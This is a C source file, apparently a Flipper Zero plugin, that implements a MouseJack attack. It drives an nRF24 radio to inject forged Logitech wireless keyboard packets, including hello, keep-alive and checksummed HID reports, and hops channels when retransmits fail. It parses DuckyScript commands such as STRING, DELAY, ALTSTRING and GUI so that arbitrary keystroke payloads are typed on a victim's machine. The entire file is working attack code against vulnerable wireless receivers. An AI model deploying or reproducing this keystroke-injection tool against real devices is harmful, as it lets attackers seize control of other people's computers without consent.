#include "mousejacker_ducky.h" static const char ducky_cmd_comment[] = {"REM"}; static const char ducky_cmd_delay[] = {"DELAY "}; static const char ducky_cmd_string[] = {"STRING "}; static const char ducky_cmd_altstring[] = {"ALTSTRING "}; static const char ducky_cmd_repeat[] = {"REPEAT "}; static uint8_t LOGITECH_HID_TEMPLATE[] = {0x00, 0xC1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}; static uint8_t LOGITECH_HELLO[] = {0x00, 0x4F, 0x00, 0x04, 0xB0, 0x10, 0x00, 0x00, 0x00, 0xED}; static uint8_t LOGITECH_KEEPALIVE[] = {0x00, 0x40, 0x00, 0x55, 0x6B}; uint8_t prev_hid = 0; static bool holding_ctrl = false; static bool holding_shift = false; static bool holding_alt = false; static bool holding_gui = false; #define RT_THRESHOLD 50 #define LOGITECH_MIN_CHANNEL 2 #define LOGITECH_MAX_CHANNEL 83 #define LOGITECH_KEEPALIVE_SIZE 5 #define LOGITECH_HID_TEMPLATE_SIZE 10 #define LOGITECH_HELLO_SIZE 10 #define TAG "mousejacker_ducky" MJDuckyKey mj_ducky_keys[] = {{" ", 44, 0}, {"!", 30, 2}, {"\"", 52, 2}, {"#", 32, 2}, {"$", 33, 2}, {"%", 34, 2}, {"&", 36, 2}, {"'", 52, 0}, {"(", 38, 2}, {")", 39, 2}, {"*", 37, 2}, {"+", 46, 2}, {",", 54, 0}, {"-", 45, 0}, {".", 55, 0}, {"/", 56, 0}, {"0", 39, 0}, {"1", 30, 0}, {"2", 31, 0}, {"3", 32, 0}, {"4", 33, 0}, {"5", 34, 0}, {"6", 35, 0}, {"7", 36, 0}, {"8", 37, 0}, {"9", 38, 0}, {":", 51, 2}, {";", 51, 0}, {"<", 54, 2}, {"=", 46, 0}, {">", 55, 2}, {"?", 56, 2}, {"@", 31, 2}, {"A", 4, 2}, {"B", 5, 2}, {"C", 6, 2}, {"D", 7, 2}, {"E", 8, 2}, {"F", 9, 2}, {"G", 10, 2}, {"H", 11, 2}, {"I", 12, 2}, {"J", 13, 2}, {"K", 14, 2}, {"L", 15, 2}, {"M", 16, 2}, {"N", 17, 2}, {"O", 18, 2}, {"P", 19, 2}, {"Q", 20, 2}, {"R", 21, 2}, {"S", 22, 2}, {"T", 23, 2}, {"U", 24, 2}, {"V", 25, 2}, {"W", 26, 2}, {"X", 27, 2}, {"Y", 28, 2}, {"Z", 29, 2}, {"[", 47, 0}, {"\\", 49, 0}, {"]", 48, 0}, {"^", 35, 2}, {"_", 45, 2}, {"`", 53, 0}, {"a", 4, 0}, {"b", 5, 0}, {"c", 6, 0}, {"d", 7, 0}, {"e", 8, 0}, {"f", 9, 0}, {"g", 10, 0}, {"h", 11, 0}, {"i", 12, 0}, {"j", 13, 0}, {"k", 14, 0}, {"l", 15, 0}, {"m", 16, 0}, {"n", 17, 0}, {"o", 18, 0}, {"p", 19, 0}, {"q", 20, 0}, {"r", 21, 0}, {"s", 22, 0}, {"t", 23, 0}, {"u", 24, 0}, {"v", 25, 0}, {"w", 26, 0}, {"x", 27, 0}, {"y", 28, 0}, {"z", 29, 0}, {"{", 47, 2}, {"|", 49, 2}, {"}", 48, 2}, {"~", 53, 2}, {"BACKSPACE", 42, 0}, {"", 0, 0}, {"ALT", 0, 4}, {"SHIFT", 0, 2}, {"CTRL", 0, 1}, {"GUI", 0, 8}, {"SCROLLLOCK", 71, 0}, {"ENTER", 40, 0}, {"F12", 69, 0}, {"HOME", 74, 0}, {"F10", 67, 0}, {"F9", 66, 0}, {"ESCAPE", 41, 0}, {"PAGEUP", 75, 0}, {"TAB", 43, 0}, {"PRINTSCREEN", 70, 0}, {"F2", 59, 0}, {"CAPSLOCK", 57, 0}, {"F1", 58, 0}, {"F4", 61, 0}, {"F6", 63, 0}, {"F8", 65, 0}, {"DOWNARROW", 81, 0}, {"DELETE", 42, 0}, {"RIGHT", 79, 0}, {"F3", 60, 0}, {"DOWN", 81, 0}, {"DEL", 76, 0}, {"END", 77, 0}, {"INSERT", 73, 0}, {"F5", 62, 0}, {"LEFTARROW", 80, 0}, {"RIGHTARROW", 79, 0}, {"PAGEDOWN", 78, 0}, {"PAUSE", 72, 0}, {"SPACE", 44, 0}, {"UPARROW", 82, 0}, {"F11", 68, 0}, {"F7", 64, 0}, {"UP", 82, 0}, {"LEFT", 80, 0}, {"NUM 1", 89, 0}, {"NUM 2", 90, 0}, {"NUM 3", 91, 0}, {"NUM 4", 92, 0}, {"NUM 5", 93, 0}, {"NUM 6", 94, 0}, {"NUM 7", 95, 0}, {"NUM 8", 96, 0}, {"NUM 9", 97, 0}, {"NUM 0", 98, 0}}; /* static bool mj_ducky_get_number(const char* param, uint32_t* val) { uint32_t value = 0; if(sscanf(param, "%lu", &value) == 1) { *val = value; return true; } return false; } */ static uint32_t mj_ducky_get_command_len(const char* line) { uint32_t len = strlen(line); for(uint32_t i = 0; i < len; i++) { if(line[i] == ' ') return i; } return 0; } static bool mj_get_ducky_key(char* key, size_t keylen, MJDuckyKey* dk) { //FURI_LOG_D(TAG, "looking up key %s with length %d", key, keylen); for(uint i = 0; i < sizeof(mj_ducky_keys) / sizeof(MJDuckyKey); i++) { if(strlen(mj_ducky_keys[i].name) == keylen && !strncmp(mj_ducky_keys[i].name, key, keylen)) { memcpy(dk, &mj_ducky_keys[i], sizeof(MJDuckyKey)); return true; } } return false; } static void checksum(uint8_t* payload, uint len) { // This is also from the KeyKeriki paper // Thanks Thorsten and Max! uint8_t cksum = 0xff; for(uint n = 0; n < len - 2; n++) cksum = (cksum - payload[n]) & 0xff; cksum = (cksum + 1) & 0xff; payload[len - 1] = cksum; } static void inject_packet( FuriHalSpiBusHandle* handle, uint8_t* addr, uint8_t addr_size, uint8_t rate, uint8_t* payload, size_t payload_size, PluginState* plugin_state) { uint8_t rt_count = 0; while(1) { if(!plugin_state->is_thread_running || plugin_state->close_thread_please) { return; } if(nrf24_txpacket(handle, payload, payload_size, true)) { break; } rt_count++; // retransmit threshold exceeded, scan for new channel if(rt_count > RT_THRESHOLD) { if(nrf24_find_channel( handle, addr, addr, addr_size, rate, LOGITECH_MIN_CHANNEL, LOGITECH_MAX_CHANNEL, true) > LOGITECH_MAX_CHANNEL) { return; // fail } //FURI_LOG_D("mj", "find channel passed, %d", tessst); rt_count = 0; } } } static void build_hid_packet(uint8_t mod, uint8_t hid, uint8_t* payload) { memcpy(payload, LOGITECH_HID_TEMPLATE, LOGITECH_HID_TEMPLATE_SIZE); payload[2] = mod; payload[3] = hid; checksum(payload, LOGITECH_HID_TEMPLATE_SIZE); } static void release_key( FuriHalSpiBusHandle* handle, uint8_t* addr, uint8_t addr_size, uint8_t rate, PluginState* plugin_state) { // This function release keys currently pressed, but keep pressing special keys // if holding mod keys variable are set to true uint8_t hid_payload[LOGITECH_HID_TEMPLATE_SIZE] = {0}; build_hid_packet( 0 | holding_ctrl | holding_shift << 1 | holding_alt << 2 | holding_gui << 3, 0, hid_payload); inject_packet( handle, addr, addr_size, rate, hid_payload, LOGITECH_HID_TEMPLATE_SIZE, plugin_state); // empty hid packet } static void send_hid_packet( FuriHalSpiBusHandle* handle, uint8_t* addr, uint8_t addr_size, uint8_t rate, uint8_t mod, uint8_t hid, PluginState* plugin_state) { uint8_t hid_payload[LOGITECH_HID_TEMPLATE_SIZE] = {0}; if(hid == prev_hid) release_key(handle, addr, addr_size, rate, plugin_state); prev_hid = hid; build_hid_packet( mod | holding_ctrl | holding_shift << 1 | holding_alt << 2 | holding_gui << 3, hid, hid_payload); inject_packet( handle, addr, addr_size, rate, hid_payload, LOGITECH_HID_TEMPLATE_SIZE, plugin_state); furi_delay_ms(12); } static bool ducky_end_line(const char chr) { return ((chr == ' ') || (chr == '\0') || (chr == '\r') || (chr == '\n')); } // returns false if there was an error processing script line static bool mj_process_ducky_line( FuriHalSpiBusHandle* handle, uint8_t* addr, uint8_t addr_size, uint8_t rate, char* line, char* prev_line, PluginState* plugin_state) { MJDuckyKey dk; uint8_t hid_payload[LOGITECH_HID_TEMPLATE_SIZE] = {0}; char* line_tmp = line; uint32_t line_len = strlen(line); if(!plugin_state->is_thread_running || plugin_state->close_thread_please) { return true; } for(uint32_t i = 0; i < line_len; i++) { if((line_tmp[i] != ' ') && (line_tmp[i] != '\t') && (line_tmp[i] != '\n')) { line_tmp = &line_tmp[i]; break; // Skip spaces and tabs } if(i == line_len - 1) return true; // Skip empty lines } FURI_LOG_D(TAG, "line: %s", line_tmp); // General commands if(strncmp(line_tmp, ducky_cmd_comment, strlen(ducky_cmd_comment)) == 0) { // REM - comment line return true; } else if(strncmp(line_tmp, ducky_cmd_delay, strlen(ducky_cmd_delay)) == 0) { // DELAY line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1]; uint32_t delay_val = 0; delay_val = atoi(line_tmp); if(delay_val > 0) { uint32_t delay_count = delay_val / 10; build_hid_packet(0, 0, hid_payload); inject_packet( handle, addr, addr_size, rate, hid_payload, LOGITECH_HID_TEMPLATE_SIZE, plugin_state); // empty hid packet for(uint32_t i = 0; i < delay_count; i++) { if(!plugin_state->is_thread_running || plugin_state->close_thread_please) { return true; } inject_packet( handle, addr, addr_size, rate, LOGITECH_KEEPALIVE, LOGITECH_KEEPALIVE_SIZE, plugin_state); furi_delay_ms(10); } return true; } return false; } else if(strncmp(line_tmp, ducky_cmd_string, strlen(ducky_cmd_string)) == 0) { // STRING line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1]; for(size_t i = 0; i < strlen(line_tmp); i++) { if(!mj_get_ducky_key(&line_tmp[i], 1, &dk)) return false; send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state); } return true; } else if(strncmp(line_tmp, ducky_cmd_altstring, strlen(ducky_cmd_altstring)) == 0) { // ALTSTRING line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1]; for(size_t i = 0; i < strlen(line_tmp); i++) { if((line_tmp[i] < ' ') || (line_tmp[i] > '~')) { continue; // Skip non-printable chars } char alt_code[4]; // Getting altcode of the char snprintf(alt_code, 4, "%u", line_tmp[i]); uint8_t j = 0; while(!ducky_end_line(alt_code[j])) { char pad_num[5] = {'N', 'U', 'M', ' ', alt_code[j]}; if(!mj_get_ducky_key(pad_num, 5, &dk)) return false; holding_alt = true; FURI_LOG_D(TAG, "Sending %s", pad_num); send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state); j++; } holding_alt = false; release_key(handle, addr, addr_size, rate, plugin_state); } return true; } else if(strncmp(line_tmp, ducky_cmd_repeat, strlen(ducky_cmd_repeat)) == 0) { // REPEAT uint32_t repeat_cnt = 0; if(prev_line == NULL) return false; line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1]; repeat_cnt = atoi(line_tmp); if(repeat_cnt < 2) return false; FURI_LOG_D(TAG, "repeating %s %ld times", prev_line, repeat_cnt); for(uint32_t i = 0; i < repeat_cnt; i++) mj_process_ducky_line(handle, addr, addr_size, rate, prev_line, NULL, plugin_state); return true; } else if(strncmp(line_tmp, "ALT", strlen("ALT")) == 0) { line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1]; if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false; holding_alt = true; send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state); holding_alt = false; return true; } else if( strncmp(line_tmp, "GUI", strlen("GUI")) == 0 || strncmp(line_tmp, "WINDOWS", strlen("WINDOWS")) == 0 || strncmp(line_tmp, "COMMAND", strlen("COMMAND")) == 0) { line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1]; if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false; holding_gui = true; send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state); holding_gui = false; return true; } else if( strncmp(line_tmp, "CTRL-ALT", strlen("CTRL-ALT")) == 0 || strncmp(line_tmp, "CONTROL-ALT", strlen("CONTROL-ALT")) == 0) { line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1]; if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false; holding_ctrl = true; holding_alt = true; send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state); holding_ctrl = false; holding_alt = false; return true; } else if( strncmp(line_tmp, "CTRL-SHIFT", strlen("CTRL-SHIFT")) == 0 || strncmp(line_tmp, "CONTROL-SHIFT", strlen("CONTROL-SHIFT")) == 0) { line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1]; if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false; holding_ctrl = true; holding_shift = true; send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state); holding_ctrl = false; holding_shift = false; return true; } else if( strncmp(line_tmp, "CTRL", strlen("CTRL")) == 0 || strncmp(line_tmp, "CONTROL", strlen("CONTROL")) == 0) { line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1]; if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false; holding_ctrl = true; send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state); holding_ctrl = false; return true; } else if(strncmp(line_tmp, "SHIFT", strlen("SHIFT")) == 0) { line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1]; if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false; holding_shift = true; send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state); holding_shift = false; return true; } else if( strncmp(line_tmp, "ESC", strlen("ESC")) == 0 || strncmp(line_tmp, "APP", strlen("APP")) == 0 || strncmp(line_tmp, "ESCAPE", strlen("ESCAPE")) == 0) { if(!mj_get_ducky_key("ESCAPE", 6, &dk)) return false; send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state); return true; } else if(strncmp(line_tmp, "ENTER", strlen("ENTER")) == 0) { if(!mj_get_ducky_key("ENTER", 5, &dk)) return false; send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state); return true; } else if( strncmp(line_tmp, "UP", strlen("UP")) == 0 || strncmp(line_tmp, "UPARROW", strlen("UPARROW")) == 0) { if(!mj_get_ducky_key("UP", 2, &dk)) return false; send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state); return true; } else if( strncmp(line_tmp, "DOWN", strlen("DOWN")) == 0 || strncmp(line_tmp, "DOWNARROW", strlen("DOWNARROW")) == 0) { if(!mj_get_ducky_key("DOWN", 4, &dk)) return false; send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state); return true; } else if( strncmp(line_tmp, "LEFT", strlen("LEFT")) == 0 || strncmp(line_tmp, "LEFTARROW", strlen("LEFTARROW")) == 0) { if(!mj_get_ducky_key("LEFT", 4, &dk)) return false; send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state); return true; } else if( strncmp(line_tmp, "RIGHT", strlen("RIGHT")) == 0 || strncmp(line_tmp, "RIGHTARROW", strlen("RIGHTARROW")) == 0) { if(!mj_get_ducky_key("RIGHT", 5, &dk)) return false; send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state); return true; } else if(strncmp(line_tmp, "SPACE", strlen("SPACE")) == 0) { if(!mj_get_ducky_key("SPACE", 5, &dk)) return false; send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state); return true; } else if(strncmp(line_tmp, "TAB", strlen("TAB")) == 0) { if(!mj_get_ducky_key("TAB", 3, &dk)) return false; send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state); return true; } return false; } void mj_process_ducky_script( FuriHalSpiBusHandle* handle, uint8_t* addr, uint8_t addr_size, uint8_t rate, char* script, PluginState* plugin_state) { uint8_t hid_payload[LOGITECH_HID_TEMPLATE_SIZE] = {0}; char* prev_line = NULL; inject_packet( handle, addr, addr_size, rate, LOGITECH_HELLO, LOGITECH_HELLO_SIZE, plugin_state); char* line = strtok(script, "\n"); while(line != NULL) { if(strcmp(&line[strlen(line) - 1], "\r") == 0) line[strlen(line) - 1] = (char)0; if(!mj_process_ducky_line(handle, addr, addr_size, rate, line, prev_line, plugin_state)) FURI_LOG_D(TAG, "unable to process ducky script line: %s", line); prev_line = line; line = strtok(NULL, "\n"); } build_hid_packet(0, 0, hid_payload); inject_packet( handle, addr, addr_size, rate, hid_payload, LOGITECH_HID_TEMPLATE_SIZE, plugin_state); // empty hid packet at end }